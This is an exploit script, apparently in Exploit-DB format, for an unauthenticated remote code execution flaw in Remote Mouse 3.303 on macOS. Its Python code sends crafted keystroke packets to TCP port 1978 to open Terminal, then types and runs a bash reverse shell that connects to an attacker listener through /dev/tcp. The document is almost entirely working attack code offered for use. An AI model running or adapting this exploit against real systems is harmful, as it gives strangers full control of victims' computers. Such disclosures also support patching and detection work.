# Exploit Title: Remote Mouse 3.303 - Remote Code Execution (MacOS)
# Date: 21/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.remotemouse.net
# Software Link: https://itunes.apple.com/app/remote-mouse/id403195710?mt=12
# Version: 3.303 (MacOS)
# Tested on: macOS Mojave 10.14.6


'''
Description:

Remote Mouse 3.303 (macOS) contains an unauthenticated remote code
execution vulnerability. By sending crafted TCP packets that simulate
keyboard input, an attacker can remotely open a terminal and execute
arbitrary commands, enabling full system compromise.
'''

import socket
import time

IP, PORT = "192.168.8.105", 1978
LHOST, LPORT = "192.168.8.102", "4444"

def send_tcp(cmd):
    try:
        with socket.socket() as s:
            s.connect((IP, PORT))
            msg = f"key{len(cmd):3d}{cmd}".encode()
            s.sendall(msg)
            time.sleep(0.1)
    except Exception as e:
        print(f"Error: {e}")

print("[+] Starting attack sequence")
print(f"Target: {IP}:{PORT}, Listener: {LHOST}:{LPORT}\n")


send_tcp("cmd[+] ")
time.sleep(2)

print("Opening terminal")
send_tcp("[noe]terminal")
time.sleep(1)

send_tcp("[kld]return")
time.sleep(0.01)
send_tcp("[klu]return")
time.sleep(2)

print("Delivering payload")
payload = f"[noe]bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"
send_tcp(payload)
time.sleep(0.1)

print("Executing payload")
send_tcp("[kld]return")
time.sleep(0.01)
send_tcp("[klu]return")

print("\n[+] Attack sequence completed - Check listener")